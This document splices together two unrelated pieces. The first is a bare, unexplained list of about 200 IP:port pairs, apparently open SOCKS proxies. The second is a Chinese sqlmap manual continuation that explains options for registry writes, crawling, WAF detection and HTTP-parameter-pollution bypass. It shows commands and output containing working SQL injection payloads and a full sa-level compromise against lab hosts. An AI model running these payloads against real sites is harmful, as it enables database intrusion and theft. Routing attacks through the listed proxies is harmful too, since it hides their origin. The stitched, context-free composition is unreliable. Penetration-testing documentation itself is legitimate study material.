141.255.161.74:1080
142.91.217.204:23537
146.115.61.107:1328
147.255.183.227:61249
147.255.183.230:61249
151.230.90.80:54929
162.105.25.123:1080
173.20.134.21:17051
173.230.140.74:10080
173.234.116.197:23537
173.234.116.203:23537
173.234.12.236:61249
173.68.77.144:1508
173.70.24.198:5065
173.71.223.105:43229
174.142.75.243:443
174.60.216.175:10661
174.70.170.55:58278
176.111.191.53:1080
177.107.75.2:1080
177.155.240.10:1080
180.211.179.30:1080
187.111.221.162:1080
188.128.99.94:1
188.241.27.148:42859
188.241.27.148:58401
189.42.17.189:1080
190.107.140.74:1080
190.107.140.76:1080
190.128.238.26:10080
190.147.36.33:1080
190.81.196.71:1080
192.151.155.180:1080
192.241.234.49:1080
192.241.234.49:27977
192.64.8.6:443
192.69.200.124:1080
194.126.140.247:1080
198.143.190.94:1080
199.168.138.244:1080
2.188.16.12:443
200.215.14.62:1080
201.147.145.146:1080
202.103.241.169:1080
202.109.133.181:1080
202.115.11.4:1080
202.120.7.122:1080
202.137.22.200:1080
202.169.236.193:1080
202.169.236.194:1080
202.169.236.195:1080
202.169.236.199:1080
202.38.95.66:1080
207.182.142.244:443
208.84.134.254:1080
209.190.35.251:1080
210.22.151.78:1080
210.23.68.7:10080
210.45.117.249:1080
210.51.44.199:1080
211.119.86.224:1080
212.57.179.193:2214
212.57.179.29:2214
212.66.60.28:1080
212.75.130.37:1080
213.111.67.82:1080
213.199.248.28:1080
213.199.248.29:1080
213.199.248.30:1080
213.199.248.31:1080
213.199.248.32:1080
213.199.248.35:1080
216.244.78.227:1080
216.244.80.153:2500
216.36.168.61:45427
218.202.183.250:1080
219.147.172.2:12345
219.223.252.183:1080
220.191.245.214:6002
221.132.35.5:2214
222.174.54.164:1080
222.188.10.1:1080
222.218.142.49:33
222.240.175.79:8580
222.90.206.134:1080
23.19.102.197:61249
24.1.151.81:22039
24.128.18.205:22445
24.146.175.103:28281
24.181.161.105:42701
24.183.232.214:3988
24.184.40.65:2547
24.217.83.234:23090
24.226.197.30:13341
24.35.162.182:1508
24.35.162.182:26074
24.6.250.152:32493
24.6.250.152:48615
24.63.202.92:39179
31.3.237.247:443
41.211.125.123:1080
41.42.241.5:1080
41.46.205.106:1080
41.84.135.33:1080
46.241.57.188:1080
49.212.58.108:10080
5.102.156.25:1080
5.228.104.45:1080
5.9.212.53:5797
58.20.0.240:1080
58.20.0.247:1080
58.213.157.68:1080
60.190.43.10:1080
60.214.223.178:1080
61.136.68.76:1080
61.163.37.76:1080
61.166.55.153:11110
62.64.79.120:443
64.194.160.2:7225
65.110.39.30:10080
65.31.134.137:42989
65.70.243.69:6897
66.168.170.55:53020
66.196.209.90:10827
66.214.101.189:1574
66.23.230.232:1080
67.187.175.216:26694
67.215.209.227:35853
67.60.187.127:42527
67.8.252.3:25567
68.188.241.29:5031
68.71.60.150:443
68.83.9.51:27557
68.96.1.118:64815
69.139.85.38:1727
69.143.1.46:54917
69.143.1.46:55259
69.15.234.90:1897
69.4.193.154:23195
69.81.146.157:30841
70.118.47.109:31639
70.119.47.206:22339
70.119.47.206:40677
70.177.213.17:11838
71.168.187.38:22063
71.194.61.194:7415
71.198.249.7:50101
71.61.141.239:33619
71.81.137.163:14079
71.93.73.104:42192
74.193.170.210:5439
75.128.223.139:29331
75.131.195.75:34551
75.133.147.135:2663
75.183.116.142:28055
76.103.102.195:37409
76.110.43.4:8865
78.25.77.206:1080
81.19.35.170:1080
82.114.79.254:1080
85.214.148.228:60006
85.68.234.87:42219
87.120.52.138:6081
88.150.193.144:6666
88.150.215.146:1080
88.150.215.169:1080
89.203.137.145:1080
89.203.137.193:1080
89.203.137.93:1080
91.121.79.98:40018
92.247.60.5:1080
92.255.235.215:1080
92.51.109.182:1080
93.103.201.98:3444
93.184.71.66:1080
93.184.71.87:1080
93.99.147.1:1080
94.248.250.78:24606
94.75.207.145:65233
95.141.35.136:1080
96.236.25.161:16379
96.252.102.45:31090
97.95.225.218:1995
97.95.225.218:32863
98.206.20.81:16285
98.207.244.241:6952
98.211.28.229:50583
98.251.255.28:17045
98.251.255.28:5110

sqlmap用户手册[续]

《sqlmap用户手册》其实只写了大部分可能用到的参数,还有些并未写,这次补上~ 顺便注:文中部分是– 而不是—— (这个不是我不愿意修改,而是网站系统的问题,实在抱歉,请大家在复制语句之后手工修改。:) )

ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来求助,吐槽完毕,正文开始:

对Windows注册表操作
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前web应用支持堆查询。 当然,当前连接数据库的用户也需要有权限操作注册表。

读取注册表值
参数:–reg-read

写入注册表值
参数:–reg-add

删除注册表值
参数:–reg-del

注册表辅助选项
参数:–reg-key,–reg-value,–reg-data,–reg-type

需要配合之前三个参数使用,例子:

1
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 –reg-add –reg-key=”HKEY_LOCAL_MACHINESOFTWAREsqlmap” –reg-value=Test –reg-type=REG_SZ –reg-data=1

常规参数
从sqlite中读取session
参数:-s

sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件,如果用户想指定读取的文件路径,就可以用这个参数。

保存HTTP(S)日志
参数:-t

这个参数需要跟一个文本文件,sqlmap会把HTTP(S)请求与响应的日志保存到那里。

非交互模式
参数:–batch

用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。

强制使用字符编码
参数:–charset

不使用sqlmap自动识别的(如HTTP头中的Content-Type)字符编码,强制指定字符编码如:

–charset=GBK
爬行网站URL
参数:–crawl

sqlmap可以收集潜在的可能存在漏洞的连接,后面跟的参数是爬行的深度。

例子:

1
$ python sqlmap.py -u “http://192.168.21.128/sqlmap/mysql/” –batch –crawl=3
2
[...]
3
[xx:xx:53] [INFO] starting crawler
4
[xx:xx:53] [INFO] searching for links with depth 1
5
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
6
[xx:xx:53] [INFO] searching for links with depth 2
7
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii’
8
[xx:xx:00] [INFO] 42/56 links visited (75%)
9
[...]

规定输出到CSV中的分隔符
参数:–csv-del

当dump保存为CSV格式时(–dump-format=CSV),需要一个分隔符默认是逗号,用户也可以改为别的 如:

1
–csv-del=”;”

DBMS身份验证
参数:–dbms-cred

某些时候当前用户的权限不够,做某些操作会失败,如果知道高权限用户的密码,可以使用此参数,有的数据库有专门的运行机制,可以切换用户如Microsoft SQL Server的OPENROWSET函数

定义dump数据的格式
参数:–dump-format

输出的格式可定义为:CSV,HTML,SQLITE

预估完成时间
参数:–eta

可以计算注入数据的剩余时间。

例如Oracle的布尔型盲注:

1
$ python sqlmap.py -u “http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1″ -b –eta
2

3
[...]
4
[hh:mm:01] [INFO] the back-end DBMS is Oracle
5
[hh:mm:01] [INFO] fetching banner
6
[hh:mm:01] [INFO] retrieving the length of query output
7
[hh:mm:01] [INFO] retrieved: 64
8
17% [========> ] 11/64 ETA 00:19

然后:

1
100% [===================================================] 64/64
2
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod
3

4
web application technology: PHP 5.2.6, Apache 2.2.9
5
back-end DBMS: Oracle
6
banner: ‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod’

sqlmap先输出长度,预计完成时间,显示百分比,输出字符

刷新session文件
参数:–flush-session

如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。

自动获取form表单测试
参数:–forms

如果你想对一个页面的form表单中的参数测试,可以使用-r参数读取请求文件,或者通过–data参数测试。 但是当使用–forms参数时,sqlmap会自动从-u中的url获取页面中的表单进行测试。

忽略在会话文件中存储的查询结果
参数:–fresh-queries

忽略session文件保存的查询,重新查询。

使用DBMS的hex函数
参数:–hex

有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:

针对PostgreSQL例子:

1
$ python sqlmap.py -u “http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1″ –banner –hex -v 3 –parse-errors
2

3
[...]
4
[xx:xx:14] [INFO] fetching banner
5
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
6
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: “:vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:” in /var/www/sqlmap/libs/pgsql.inc.php on line 35
7
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
8
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
9
[...]

自定义输出的路径
参数:–output-dir

sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–output-dir=/tmp

从响应中获取DBMS的错误信息
参数:–parse-errors

有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。

01
$ python sqlmap.py -u “http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1″ –parse-errors
02
[...]
03
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
04
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
05
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
06
/sqlmap/mssql/iis/get_int.asp, line 27
07
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
08
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
09
/sqlmap/mssql/iis/get_int.asp, line 27
10
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
11
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
12
/sqlmap/mssql/iis/get_int.asp, line 27
13
[11:12:17] [INFO] target URL appears to have 3 columns in query
14
[...]

其他的一些参数
使用参数缩写
参数:-z

有使用参数太长太复杂,可以使用缩写模式。 例如:

1
python sqlmap.py –batch –random-agent –ignore-proxy –technique=BEU -u “www.target.com/vuln.php?id=1″

可以写成:

1
python sqlmap.py -z “bat,randoma,ign,tec=BEU” -u “www.target.com/vuln.php?id=1″

还有:

1
python sqlmap.py –ignore-proxy –flush-session –technique=U –dump -D testdb -T users -u “www.target.com/vuln.php?id=1″

可以写成:

1
python sqlmap.py -z “ign,flu,bat,tec=U,dump,D=testdb,T=users” -u “www.target.com/vuln.php?id=1″

成功SQL注入时警告
参数:–alert

设定会发的答案
参数:–answers

当希望sqlmap提出输入时,自动输入自己想要的答案可以使用此参数: 例子:

1
$ python sqlmap.py -u “http://192.168.22.128/sqlmap/mysql/get_int.php?id=1″–technique=E –answers=”extending=N” –batch
2
[...]
3
[xx:xx:56] [INFO] testing for SQL injection on GET parameter ‘id’
4
heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
5
[xx:xx:56] [INFO] do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1)? [Y/n] N
6
[...]

发现SQL注入时发出蜂鸣声
参数:–beep

发现sql注入时,发出蜂鸣声。

启发式检测WAF/IPS/IDS保护
参数:–check-waf

WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰,如果怀疑目标有此防护的话,可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试

例如:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
如果有保护的话可能返回结果会不同。

清理sqlmap的UDF(s)和表
参数:–cleanup

清除sqlmap注入时产生的udf与表。

禁用彩色输出
参数:–desable-coloring

sqlmap默认彩色输出,可以使用此参数,禁掉彩色输出。

使用指定的Google结果页面
参数:–gpage

默认sqlmap使用前100个URL地址作为注入测试,结合此选项,可以指定页面的URL测试。

使用HTTP参数污染
参数:-hpp

HTTP参数污染可能会绕过WAF/IPS/IDS保护机制,这个对ASP/IIS与ASP.NET/IIS平台很有效。

测试WAF/IPS/IDS保护
参数:–identify-waf

sqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。

例如对一个受到ModSecurity WAF保护的MySQL例子:

01
$ python sqlmap.py -u “http://192.168.21.128/sqlmap/mysql/get_int.php?id=1″ –identify-waf -v 3
02
[...]
03
[xx:xx:23] [INFO] testing connection to the target URL
04
[xx:xx:23] [INFO] heuristics detected web page charset ‘ascii’
05
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
06
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘USP Secure Entry Server (United Security Providers)’
07
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘BinarySEC Web Application Firewall (BinarySEC)’
08
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)’
09
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Hyperguard Web Application Firewall (art of defence Inc.)’
10
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Cisco ACE XML Gateway (Cisco Systems)’
11
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘TrafficShield (F5 Networks)’
12
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)’
13
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KONA Security Solutions (Akamai Technologies)’
14
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Incapsula Web Application Firewall (Incapsula/Imperva)’
15
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘CloudFlare Web Application Firewall (CloudFlare)’
16
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Barracuda Web Application Firewall (Barracuda Networks)’
17
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘webApp.secure (webScurity)’
18
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Proventia Web Application Security (IBM)’
19
[xx:xx:23] [DEBUG] declared web page charset ‘iso-8859-1′
20
[xx:xx:23] [DEBUG] page not found (404)
21
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KS-WAF (Knownsec)’
22
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetScaler (Citrix Systems)’
23
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Jiasule Web Application Firewall (Jiasule)’
24
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘WebKnight Application Firewall (AQTRONIX)’
25
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘AppWall (Radware)’
26
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘ModSecurity: Open Source Web Application Firewall (Trustwave)’
27
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified ‘ModSecurity: Open Source Web Application Firewall (Trustwave)’. Please consider usage of tamper scripts (option ‘–tamper’)
28
[...]

模仿智能手机
参数:–mobile

有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。

例如:

01
$ python sqlmap.py -u “http://www.target.com/vuln.php?id=1″ –mobile
02
[...]
03
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
04
[1] Apple iPhone 4s (default)
05
[2] BlackBerry 9900
06
[3] Google Nexus 7
07
[4] HP iPAQ 6365
08
[5] HTC Sensation
09
[6] Nokia N97
10
[7] Samsung Galaxy S
11
> 1
12
[...]

安全的删除output目录的文件
参数:–purge-output

有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。

例如:

01
$ python sqlmap.py –purge-output -v 3
02
[...]
03
[xx:xx:55] [INFO] purging content of directory ‘/home/user/sqlmap/output’…
04
[xx:xx:55] [DEBUG] changing file attributes
05
[xx:xx:55] [DEBUG] writing random data to files
06
[xx:xx:55] [DEBUG] truncating files
07
[xx:xx:55] [DEBUG] renaming filenames to random values
08
[xx:xx:55] [DEBUG] renaming directory names to random values
09
[xx:xx:55] [DEBUG] deleting the whole directory tree
10
[...]

启发式判断注入
参数:–smart

有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。

例子:

01
$ python sqlmap.py -u “http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1″ –batch –smart
02
[...]
03
[xx:xx:14] [INFO] testing if GET parameter ‘ca’ is dynamic
04
[xx:xx:14] [WARNING] GET parameter ‘ca’ does not appear dynamic
05
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘ca’ might not be injectable
06
[xx:xx:14] [INFO] skipping GET parameter ‘ca’
07
[xx:xx:14] [INFO] testing if GET parameter ‘user’ is dynamic
08
[xx:xx:14] [WARNING] GET parameter ‘user’ does not appear dynamic
09
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘user’ might not be injectable
10
[xx:xx:14] [INFO] skipping GET parameter ‘user’
11
[xx:xx:14] [INFO] testing if GET parameter ‘id’ is dynamic
12
[xx:xx:14] [INFO] confirming that GET parameter ‘id’ is dynamic
13
[xx:xx:14] [INFO] GET parameter ‘id’ is dynamic
14
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
15
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
16
[xx:xx:14] [INFO] testing for SQL injection on GET parameter ‘id’
17
heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
18
do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1)? [Y/n] Y
19
[xx:xx:14] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
20
[xx:xx:14] [INFO] GET parameter ‘id’ is ‘AND boolean-based blind – WHERE or HAVING clause’ injectable
21
[xx:xx:14] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
22
[xx:xx:14] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’ injectable
23
[xx:xx:14] [INFO] testing ‘MySQL inline queries’
24
[xx:xx:14] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
25
[xx:xx:14] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)'
26
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind’
27
[xx:xx:24] [INFO] GET parameter ‘id’ is ‘MySQL > 5.0.11 AND time-based blind’ injectable
28
[xx:xx:24] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
29
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
30
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
31
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
32
[xx:xx:24] [INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
33
[...]

初级用户向导参数
参数:–wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。

01
$ python sqlmap.py –wizard
02

03
sqlmap/1.0-dev-2defc30 – automatic SQL injection and database takeover tool
04

05

http://sqlmap.org

06

07
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
08

09
[*] starting at 11:25:26
10

11
Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
12
POST data (–data) [Enter for None]:
13
Injection difficulty (–level/–risk). Please choose:
14
[1] Normal (default)
15
[2] Medium
16
[3] Hard
17
> 1
18
Enumeration (–banner/–current-user/etc). Please choose:
19
[1] Basic (default)
20
[2] Smart
21
[3] All
22
> 1
23

24
sqlmap is running, please wait..
25

26
heuristic (parsing) test showed that the back-end DBMS could be ‘Microsoft SQL Server’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
27
do you want to include all tests for ‘Microsoft SQL Server’ extending provided level (1) and risk (1)? [Y/n] Y
28
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
29
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
30

31
Place: GET
32
Parameter: id
33
Type: boolean-based blind
34
Title: AND boolean-based blind – WHERE or HAVING clause
35
Payload: id=1 AND 2986=2986
36

37
Type: error-based
38
Title: Microsoft SQL Server/Sybase AND error-based – WHERE or HAVING clause
39
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
40

41
Type: UNION query
42
Title: Generic UNION query (NULL) – 3 columns
43
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)–
44

45
Type: stacked queries
46
Title: Microsoft SQL Server/Sybase stacked queries
47
Payload: id=1; WAITFOR DELAY ’0:0:5′–
48

49
Type: AND/OR time-based blind
50
Title: Microsoft SQL Server/Sybase time-based blind
51
Payload: id=1 WAITFOR DELAY ’0:0:5′–
52

53
Type: inline query
54
Title: Microsoft SQL Server/Sybase inline queries
55
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
56

57
web server operating system: Windows XP
58
web application technology: ASP, Microsoft IIS 5.1
59
back-end DBMS operating system: Windows XP Service Pack 2
60
back-end DBMS: Microsoft SQL Server 2005
61
banner:
62

63
Microsoft SQL Server 2005 – 9.00.1399.06 (Intel X86)
64
Oct 14 2005 00:33:37
65
Copyright (c) 1988-2005 Microsoft Corporation
66
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
67

68
current user: ‘sa’
69
current database: ‘testdb’
70
current user is DBA: True
71

72
[*] shutting down at 11:25:52
link:http://drops.wooyun.org/tips/401

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。